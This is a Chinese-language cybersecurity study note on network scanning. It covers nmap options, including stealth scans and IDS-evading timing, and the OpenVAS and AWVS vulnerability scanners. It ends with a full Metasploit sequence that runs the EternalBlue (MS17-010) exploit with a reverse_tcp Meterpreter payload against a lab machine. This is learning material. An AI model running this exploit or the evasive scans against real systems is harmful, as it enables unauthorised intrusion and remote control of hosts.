网络安全学习笔记：关于扫描

 关于扫描

1、资产发现

资产整理，发现，收集 联网设备、主机、服务器、各种服务等

主机发现 有哪些主机在线，IP地址 端口扫描 确定在线主机开启端口---端口上使用的服务 开启的端口、端口上的服务

2、nmap

用处：可以跨网段扫描

参数

-sP/-sn 不进行端口扫描
-p      指定端口
-p 80
-p 1-80
-p 80,3389,8080
-p 1-65535  -p-
​
-sT               TCP全连接扫描  建立完整的三次握手
nmap 172.16.13.1  -sT
-sS               SYN半连接扫描  只进行三次握手的前两次
nmap 172.16.13.1 -p 80 -sS
​
        隐蔽扫描
-sN               Null扫描    标志位全为0
-sX               Xmas扫描
-sF               Fin扫描
-sV             显示服务的详细版本
nmap -sV 172.16.13.1 -p 80 -sT
-O                获取操作系统类型（不太准确）
-oN/-oX           保存扫描结果，txt/xml
            xpath 自学
    nmap -oN name -p 80
-A                全面扫描  nmap -p- -A 127.0.0.1 
-T0 ~ -T5         时序选项(扫描速度 T0最慢-用于IDS逃避，默认T3)

3、漏洞扫描

Web漏洞扫描
    OpenVAS（扫描操作系统、也可以对网站扫描）
        Configuration -->Targets
        Scans -->Tasks
    AWVS（扫描网站）
    
爬行网站目录
    asp、.net、php

关于漏洞

漏洞风险等级
    高危、中危、低危、信息泄露
漏洞扫描
漏洞危害
    前半部分、后半部分（后半部分---自由发挥）
修复建议
    前半部分、后半部分

MSF

kali下直接         msfconsole
​
msfconsole
search MS17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS 192.168.1.143    //目标靶机ip
set LHOST 192.168.1.142    //本机IP
exploit